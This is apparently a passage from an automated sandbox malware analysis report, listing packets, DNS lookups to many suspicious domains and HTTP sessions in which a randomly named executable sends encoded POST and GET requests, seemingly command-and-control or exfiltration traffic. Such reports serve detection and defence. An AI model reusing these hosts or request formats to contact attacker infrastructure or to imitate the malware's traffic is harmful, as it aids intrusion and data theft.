                                                                                                                      Nov 26, 2024 11:19:30.261676073 CET5001980192.168.2.6172.67.209.48
                                                                                                                      Nov 26, 2024 11:19:30.524071932 CET5001980192.168.2.6172.67.209.48
                                                                                                                      Nov 26, 2024 11:19:31.542443991 CET5002080192.168.2.6172.67.209.48
                                                                                                                      Nov 26, 2024 11:19:31.662477016 CET8050020172.67.209.48192.168.2.6
                                                                                                                      Nov 26, 2024 11:19:31.662661076 CET5002080192.168.2.6172.67.209.48
                                                                                                                      Nov 26, 2024 11:19:31.674840927 CET5002080192.168.2.6172.67.209.48
                                                                                                                      Nov 26, 2024 11:19:31.794857025 CET8050020172.67.209.48192.168.2.6
                                                                                                                      Nov 26, 2024 11:19:31.794913054 CET8050020172.67.209.48192.168.2.6
                                                                                                                      Nov 26, 2024 11:19:32.899388075 CET8050020172.67.209.48192.168.2.6
                                                                                                                      Nov 26, 2024 11:19:32.899518013 CET8050020172.67.209.48192.168.2.6
                                                                                                                      Nov 26, 2024 11:19:32.899574041 CET5002080192.168.2.6172.67.209.48
                                                                                                                      Nov 26, 2024 11:19:32.900015116 CET8050020172.67.209.48192.168.2.6
                                                                                                                      Nov 26, 2024 11:19:32.900063992 CET5002080192.168.2.6172.67.209.48
                                                                                                                      Nov 26, 2024 11:19:33.180373907 CET5002080192.168.2.6172.67.209.48
                                                                                                                      Nov 26, 2024 11:19:34.198838949 CET5002180192.168.2.6172.67.209.48
                                                                                                                      Nov 26, 2024 11:19:34.319623947 CET8050021172.67.209.48192.168.2.6
                                                                                                                      Nov 26, 2024 11:19:34.319744110 CET5002180192.168.2.6172.67.209.48
                                                                                                                      Nov 26, 2024 11:19:34.332317114 CET5002180192.168.2.6172.67.209.48
                                                                                                                      Nov 26, 2024 11:19:34.454200983 CET8050021172.67.209.48192.168.2.6
                                                                                                                      Nov 26, 2024 11:19:35.497819901 CET8050021172.67.209.48192.168.2.6
                                                                                                                      Nov 26, 2024 11:19:35.498091936 CET8050021172.67.209.48192.168.2.6
                                                                                                                      Nov 26, 2024 11:19:35.498195887 CET5002180192.168.2.6172.67.209.48
                                                                                                                      Nov 26, 2024 11:19:35.498281002 CET8050021172.67.209.48192.168.2.6
                                                                                                                      Nov 26, 2024 11:19:35.498330116 CET5002180192.168.2.6172.67.209.48
                                                                                                                      Nov 26, 2024 11:19:35.500731945 CET5002180192.168.2.6172.67.209.48
                                                                                                                      Nov 26, 2024 11:19:35.625433922 CET8050021172.67.209.48192.168.2.6

                                                                                                                      UDP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Nov 26, 2024 11:17:18.581737995 CET5209653192.168.2.61.1.1.1
                                                                                                                      Nov 26, 2024 11:17:19.256618977 CET53520961.1.1.1192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:36.135838032 CET5700953192.168.2.61.1.1.1
                                                                                                                      Nov 26, 2024 11:17:36.760312080 CET53570091.1.1.1192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:51.465099096 CET5368053192.168.2.61.1.1.1
                                                                                                                      Nov 26, 2024 11:17:52.246788025 CET53536801.1.1.1192.168.2.6
                                                                                                                      Nov 26, 2024 11:18:06.511610031 CET6358853192.168.2.61.1.1.1
                                                                                                                      Nov 26, 2024 11:18:07.508336067 CET6358853192.168.2.61.1.1.1
                                                                                                                      Nov 26, 2024 11:18:07.725570917 CET53635881.1.1.1192.168.2.6
                                                                                                                      Nov 26, 2024 11:18:07.725755930 CET53635881.1.1.1192.168.2.6
                                                                                                                      Nov 26, 2024 11:18:22.121480942 CET4961353192.168.2.61.1.1.1
                                                                                                                      Nov 26, 2024 11:18:23.026593924 CET53496131.1.1.1192.168.2.6
                                                                                                                      Nov 26, 2024 11:18:37.605452061 CET5013553192.168.2.61.1.1.1
                                                                                                                      Nov 26, 2024 11:18:38.602078915 CET5013553192.168.2.61.1.1.1
                                                                                                                      Nov 26, 2024 11:18:38.733089924 CET53501351.1.1.1192.168.2.6
                                                                                                                      Nov 26, 2024 11:18:38.741120100 CET53501351.1.1.1192.168.2.6
                                                                                                                      Nov 26, 2024 11:18:53.496623993 CET5277953192.168.2.61.1.1.1
                                                                                                                      Nov 26, 2024 11:18:54.492824078 CET5277953192.168.2.61.1.1.1
                                                                                                                      Nov 26, 2024 11:18:54.755103111 CET53527791.1.1.1192.168.2.6
                                                                                                                      Nov 26, 2024 11:18:54.755116940 CET53527791.1.1.1192.168.2.6
                                                                                                                      Nov 26, 2024 11:19:10.278708935 CET6301253192.168.2.61.1.1.1
                                                                                                                      Nov 26, 2024 11:19:11.107253075 CET53630121.1.1.1192.168.2.6
                                                                                                                      Nov 26, 2024 11:19:25.828097105 CET5205853192.168.2.61.1.1.1
                                                                                                                      Nov 26, 2024 11:19:26.149534941 CET53520581.1.1.1192.168.2.6

                                                                                                                      DNS Queries

                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                      Nov 26, 2024 11:17:18.581737995 CET192.168.2.61.1.1.10x6163Standard query (0)www.rtpterbaruwaktu3.xyzA (IP address)IN (0x0001)false
                                                                                                                      Nov 26, 2024 11:17:36.135838032 CET192.168.2.61.1.1.10xf3dcStandard query (0)www.70kdd.topA (IP address)IN (0x0001)false
                                                                                                                      Nov 26, 2024 11:17:51.465099096 CET192.168.2.61.1.1.10x908cStandard query (0)www.acond-22-mvr.clickA (IP address)IN (0x0001)false
                                                                                                                      Nov 26, 2024 11:18:06.511610031 CET192.168.2.61.1.1.10x3c51Standard query (0)www.smartcongress.netA (IP address)IN (0x0001)false
                                                                                                                      Nov 26, 2024 11:18:07.508336067 CET192.168.2.61.1.1.10x3c51Standard query (0)www.smartcongress.netA (IP address)IN (0x0001)false
                                                                                                                      Nov 26, 2024 11:18:22.121480942 CET192.168.2.61.1.1.10x7160Standard query (0)www.mrpokrovskii.proA (IP address)IN (0x0001)false
                                                                                                                      Nov 26, 2024 11:18:37.605452061 CET192.168.2.61.1.1.10x4008Standard query (0)www.ytsd88.topA (IP address)IN (0x0001)false
                                                                                                                      Nov 26, 2024 11:18:38.602078915 CET192.168.2.61.1.1.10x4008Standard query (0)www.ytsd88.topA (IP address)IN (0x0001)false
                                                                                                                      Nov 26, 2024 11:18:53.496623993 CET192.168.2.61.1.1.10xe33bStandard query (0)www.matteicapital.onlineA (IP address)IN (0x0001)false
                                                                                                                      Nov 26, 2024 11:18:54.492824078 CET192.168.2.61.1.1.10xe33bStandard query (0)www.matteicapital.onlineA (IP address)IN (0x0001)false
                                                                                                                      Nov 26, 2024 11:19:10.278708935 CET192.168.2.61.1.1.10x850eStandard query (0)www.llljjjiii.shopA (IP address)IN (0x0001)false
                                                                                                                      Nov 26, 2024 11:19:25.828097105 CET192.168.2.61.1.1.10x3a08Standard query (0)www.ampsamkok88.shopA (IP address)IN (0x0001)false

                                                                                                                      DNS Answers

                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                      Nov 26, 2024 11:17:19.256618977 CET1.1.1.1192.168.2.60x6163No error (0)www.rtpterbaruwaktu3.xyzrtpterbaruwaktu3.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Nov 26, 2024 11:17:19.256618977 CET1.1.1.1192.168.2.60x6163No error (0)rtpterbaruwaktu3.xyz103.21.221.87A (IP address)IN (0x0001)false
                                                                                                                      Nov 26, 2024 11:17:36.760312080 CET1.1.1.1192.168.2.60xf3dcNo error (0)www.70kdd.top70kdd.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Nov 26, 2024 11:17:36.760312080 CET1.1.1.1192.168.2.60xf3dcNo error (0)70kdd.top38.47.232.124A (IP address)IN (0x0001)false
                                                                                                                      Nov 26, 2024 11:17:52.246788025 CET1.1.1.1192.168.2.60x908cNo error (0)www.acond-22-mvr.click199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                      Nov 26, 2024 11:18:07.725570917 CET1.1.1.1192.168.2.60x3c51No error (0)www.smartcongress.netsmartcongress.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Nov 26, 2024 11:18:07.725570917 CET1.1.1.1192.168.2.60x3c51No error (0)smartcongress.net146.88.233.115A (IP address)IN (0x0001)false
                                                                                                                      Nov 26, 2024 11:18:07.725755930 CET1.1.1.1192.168.2.60x3c51No error (0)www.smartcongress.netsmartcongress.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Nov 26, 2024 11:18:07.725755930 CET1.1.1.1192.168.2.60x3c51No error (0)smartcongress.net146.88.233.115A (IP address)IN (0x0001)false
                                                                                                                      Nov 26, 2024 11:18:23.026593924 CET1.1.1.1192.168.2.60x7160No error (0)www.mrpokrovskii.pro194.85.61.76A (IP address)IN (0x0001)false
                                                                                                                      Nov 26, 2024 11:18:23.026593924 CET1.1.1.1192.168.2.60x7160No error (0)www.mrpokrovskii.pro109.70.26.37A (IP address)IN (0x0001)false
                                                                                                                      Nov 26, 2024 11:18:38.733089924 CET1.1.1.1192.168.2.60x4008No error (0)www.ytsd88.top47.76.213.197A (IP address)IN (0x0001)false
                                                                                                                      Nov 26, 2024 11:18:38.741120100 CET1.1.1.1192.168.2.60x4008No error (0)www.ytsd88.top47.76.213.197A (IP address)IN (0x0001)false
                                                                                                                      Nov 26, 2024 11:18:54.755103111 CET1.1.1.1192.168.2.60xe33bNo error (0)www.matteicapital.online208.91.197.27A (IP address)IN (0x0001)false
                                                                                                                      Nov 26, 2024 11:18:54.755116940 CET1.1.1.1192.168.2.60xe33bNo error (0)www.matteicapital.online208.91.197.27A (IP address)IN (0x0001)false
                                                                                                                      Nov 26, 2024 11:19:11.107253075 CET1.1.1.1192.168.2.60x850eNo error (0)www.llljjjiii.shop8.210.114.150A (IP address)IN (0x0001)false
                                                                                                                      Nov 26, 2024 11:19:26.149534941 CET1.1.1.1192.168.2.60x3a08No error (0)www.ampsamkok88.shop172.67.209.48A (IP address)IN (0x0001)false
                                                                                                                      Nov 26, 2024 11:19:26.149534941 CET1.1.1.1192.168.2.60x3a08No error (0)www.ampsamkok88.shop104.21.15.243A (IP address)IN (0x0001)false

                                                                                                                      HTTP Request Dependency Graph

                                                                                                                      • www.rtpterbaruwaktu3.xyz
                                                                                                                      • www.70kdd.top
                                                                                                                      • www.acond-22-mvr.click
                                                                                                                      • www.smartcongress.net
                                                                                                                      • www.mrpokrovskii.pro
                                                                                                                      • www.ytsd88.top
                                                                                                                      • www.matteicapital.online
                                                                                                                      • www.llljjjiii.shop
                                                                                                                      • www.ampsamkok88.shop

                                                                                                                      HTTP Packets

                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      0192.168.2.649805103.21.221.87802444C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 26, 2024 11:17:19.394519091 CET369OUTGET /7yx4/?4nJt=m5A4fx9ZIvMjycGMPfzrz9w2buYwlryi7dKiWry0Mz65334dxjvJlwP/oWrLHd67Yf3RW+voxQmVQwC1SSJQfxXg8RiZPfSfo9OGQETOHlofaWbM+4fubyGFlkwZbqaQYg0Zq5k=&pXIDi=30N834GpBZU0OT HTTP/1.1
                                                                                                                      Host: www.rtpterbaruwaktu3.xyz
                                                                                                                      Accept: */*
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                      Nov 26, 2024 11:17:21.031378984 CET1033INHTTP/1.1 404 Not Found
                                                                                                                      Connection: close
                                                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                      pragma: no-cache
                                                                                                                      content-type: text/html
                                                                                                                      content-length: 796
                                                                                                                      date: Tue, 26 Nov 2024 10:17:20 GMT
                                                                                                                      server: LiteSpeed
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      1192.168.2.64984538.47.232.124802444C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 26, 2024 11:17:36.905915022 CET600OUTPOST /klhq/ HTTP/1.1
                                                                                                                      Host: www.70kdd.top
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.70kdd.top
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 209
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.70kdd.top/klhq/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                      Data Raw: 34 6e 4a 74 3d 4e 46 77 66 6f 58 62 65 63 77 61 77 57 5a 30 4c 72 69 44 39 76 66 6c 76 45 4d 36 6b 31 4e 44 55 63 30 6a 53 51 43 51 31 66 64 55 56 64 6d 76 4d 30 70 39 46 2f 34 34 75 45 44 33 77 61 6c 65 30 7a 54 72 39 6d 7a 2f 6d 68 41 57 70 63 73 31 75 47 50 52 6d 69 64 33 51 6b 58 78 68 6c 70 34 68 30 34 77 55 39 4b 58 4b 30 42 61 65 32 39 73 53 41 51 62 44 44 57 41 68 38 31 68 66 39 65 68 56 39 6f 36 73 38 46 42 41 62 73 5a 69 7a 51 30 4b 68 64 42 38 31 6e 74 65 46 6d 72 39 42 63 77 32 63 37 45 42 77 61 50 5a 62 37 4d 30 67 62 47 6f 6e 64 69 32 71 67 4a 38 64 41 48 68 77 30 66 67 49 30 50 59 2f 49 66 46 76 5a 4e 55
                                                                                                                      Data Ascii: 4nJt=NFwfoXbecwawWZ0LriD9vflvEM6k1NDUc0jSQCQ1fdUVdmvM0p9F/44uED3wale0zTr9mz/mhAWpcs1uGPRmid3QkXxhlp4h04wU9KXK0Bae29sSAQbDDWAh81hf9ehV9o6s8FBAbsZizQ0KhdB81nteFmr9Bcw2c7EBwaPZb7M0gbGondi2qgJ8dAHhw0fgI0PY/IfFvZNU
                                                                                                                      Nov 26, 2024 11:17:38.476531029 CET312INHTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Tue, 26 Nov 2024 10:17:38 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 148
                                                                                                                      Connection: close
                                                                                                                      ETag: "66e01838-94"
                                                                                                                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      2192.168.2.64985238.47.232.124802444C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 26, 2024 11:17:39.575300932 CET624OUTPOST /klhq/ HTTP/1.1
                                                                                                                      Host: www.70kdd.top
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.70kdd.top
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 233
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.70kdd.top/klhq/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                      Data Raw: 34 6e 4a 74 3d 4e 46 77 66 6f 58 62 65 63 77 61 77 58 35 6b 4c 70 42 72 39 2f 50 6c 6f 59 38 36 6b 2b 74 44 51 63 30 2f 53 51 42 64 75 44 2b 77 56 54 6b 33 4d 31 6f 39 46 36 34 34 75 4b 6a 33 31 46 31 65 46 7a 54 6e 62 6d 7a 44 6d 68 42 32 70 63 6f 78 75 47 38 49 55 69 4e 33 65 72 33 78 6a 37 5a 34 68 30 34 77 55 39 4b 44 67 30 42 43 65 32 74 38 53 41 30 50 63 4a 32 41 6d 31 56 68 66 35 65 67 65 39 6f 36 61 38 41 5a 36 62 70 46 69 7a 55 34 4b 69 4d 42 37 2b 6e 74 51 49 47 71 58 47 76 4a 74 52 35 31 79 32 70 37 30 59 70 38 53 73 4e 62 79 37 75 69 56 34 77 70 2b 64 43 66 54 77 55 66 4b 4b 30 33 59 74 66 54 69 67 74 6f 33 6c 42 35 76 43 48 4c 31 59 33 56 58 73 34 71 61 57 62 4b 4f 73 67 3d 3d
                                                                                                                      Data Ascii: 4nJt=NFwfoXbecwawX5kLpBr9/PloY86k+tDQc0/SQBduD+wVTk3M1o9F644uKj31F1eFzTnbmzDmhB2pcoxuG8IUiN3er3xj7Z4h04wU9KDg0BCe2t8SA0PcJ2Am1Vhf5ege9o6a8AZ6bpFizU4KiMB7+ntQIGqXGvJtR51y2p70Yp8SsNby7uiV4wp+dCfTwUfKK03YtfTigto3lB5vCHL1Y3VXs4qaWbKOsg==
                                                                                                                      Nov 26, 2024 11:17:41.243105888 CET312INHTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Tue, 26 Nov 2024 10:17:40 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 148
                                                                                                                      Connection: close
                                                                                                                      ETag: "66e01838-94"
                                                                                                                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      3192.168.2.64985838.47.232.124802444C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 26, 2024 11:17:42.246438980 CET1637OUTPOST /klhq/ HTTP/1.1
                                                                                                                      Host: www.70kdd.top
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.70kdd.top
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 1245
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.70kdd.top/klhq/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                      Data Raw: 34 6e 4a 74 3d 4e 46 77 66 6f 58 62 65 63 77 61 77 58 35 6b 4c 70 42 72 39 2f 50 6c 6f 59 38 36 6b 2b 74 44 51 63 30 2f 53 51 42 64 75 44 2b 34 56 54 52 72 4d 36 72 46 46 39 34 34 75 55 7a 33 30 46 31 65 59 7a 54 2f 58 6d 7a 50 32 68 45 79 70 64 4c 35 75 50 74 49 55 73 4e 33 65 67 58 78 67 6c 70 35 70 30 34 67 51 39 4b 54 67 30 42 43 65 32 76 55 53 4a 41 62 63 47 57 41 68 38 31 68 44 39 65 67 32 39 72 4c 76 38 41 74 71 62 64 4a 69 7a 77 55 4b 78 4b 56 37 38 48 73 32 4c 47 71 50 47 75 31 49 52 39 63 42 32 70 2f 65 59 70 59 53 70 73 6d 79 75 2f 6d 64 73 53 6c 39 41 44 2f 45 39 53 66 68 56 48 43 6b 70 74 62 39 72 4f 51 47 72 52 35 78 50 56 4b 55 65 55 78 46 6c 66 76 33 64 4a 4b 46 34 70 77 49 48 4b 33 6a 48 66 6c 44 4e 31 38 6d 72 52 53 48 61 77 38 66 4f 42 77 73 2b 79 68 43 57 6f 35 75 4e 56 42 35 76 48 76 39 4f 41 59 7a 45 6d 49 39 67 7a 36 5a 55 59 54 6f 56 70 46 6e 6c 32 6c 49 50 43 64 32 73 78 45 48 4f 6b 36 69 75 66 43 4c 55 41 33 52 6e 4b 73 47 71 71 55 6e 45 54 6b 45 57 4b 6a 4f 2f 6e 63 34 77 [TRUNCATED]
                                                                                                                      Data Ascii: 4nJt=NFwfoXbecwawX5kLpBr9/PloY86k+tDQc0/SQBduD+4VTRrM6rFF944uUz30F1eYzT/XmzP2hEypdL5uPtIUsN3egXxglp5p04gQ9KTg0BCe2vUSJAbcGWAh81hD9eg29rLv8AtqbdJizwUKxKV78Hs2LGqPGu1IR9cB2p/eYpYSpsmyu/mdsSl9AD/E9SfhVHCkptb9rOQGrR5xPVKUeUxFlfv3dJKF4pwIHK3jHflDN18mrRSHaw8fOBws+yhCWo5uNVB5vHv9OAYzEmI9gz6ZUYToVpFnl2lIPCd2sxEHOk6iufCLUA3RnKsGqqUnETkEWKjO/nc4w42VCdgOePDuTx8JsUoQlOGZ+XZsKy06y714lZmQzNC1mRXCNAMLbV3Fxam6vU4SpR/9xzsXbkffp4SE4LA4SXr0m5IFoj/X48DkXSoT3XcoNpgyNlXqibgNLtfXOjtgG2o+nIkUhj2DilNp3/QgA0SCjeSQia9L5yj82QLU3SSNJFf99FOOU+tiF3PKN6eQVbbqVyuphN28mKeY/0EwMoyGahDwY3piOdUqqbCYI1RuvYlXBFJd9R0MytVEFJBzWquTrtf/Ret5pkuYeA3qgRWg9hLiaus/x+gFfgO8QKLHcoQpsd0S+afK640524hM/nTYP3i1beNwROrUU8VY9eKaVNmPVzerrRSzV+fl1EifL16oCaanDM/fWDR+ESjUVC9Rgg9RsfKaaff4Kg3PUN/Rbqt/BlZN82wAwcr4QfbiQpA9qL2f5xA8EVctNuA6NgAISZ1w8Ws1XtV9DKU0gsnM/+v0jzogEj5drUUC9BdZxDuwsbeUaYbuLqYLTHhPqxieuNiTkETrysg7bzRPHRxxM2v2YCy2tkChoItqRefRIqOK5ZZX+EuUSj3mYB3mmFwGHj4nUUexvgXAWsAE9WRTOXhCkcAhWQU4igz5prmZzbdVNcz+YLAME53l6A+8UehgkI/4b5lgRy6Ql/0dopSUNEYczZbfqbJ [TRUNCATED]
                                                                                                                      Nov 26, 2024 11:17:43.760225058 CET312INHTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Tue, 26 Nov 2024 10:17:43 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 148
                                                                                                                      Connection: close
                                                                                                                      ETag: "66e01838-94"
                                                                                                                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      4192.168.2.64986538.47.232.124802444C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 26, 2024 11:17:44.913440943 CET358OUTGET /klhq/?4nJt=AHY/rhT5FAaHaOQwqTnzrcskZO2I+4brO2rEekNoUo4JX0G52JlH+4AuLBXgGUSDwTLgniL6s02sZcl+Gf8+neDAiWkCkYZ57L047aTN0FvloZtiL1GHORQkvVBkncoqs6arxlw=&pXIDi=30N834GpBZU0OT HTTP/1.1
                                                                                                                      Host: www.70kdd.top
                                                                                                                      Accept: */*
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                      Nov 26, 2024 11:17:46.448482037 CET312INHTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Tue, 26 Nov 2024 10:17:46 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 148
                                                                                                                      Connection: close
                                                                                                                      ETag: "66e01838-94"
                                                                                                                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
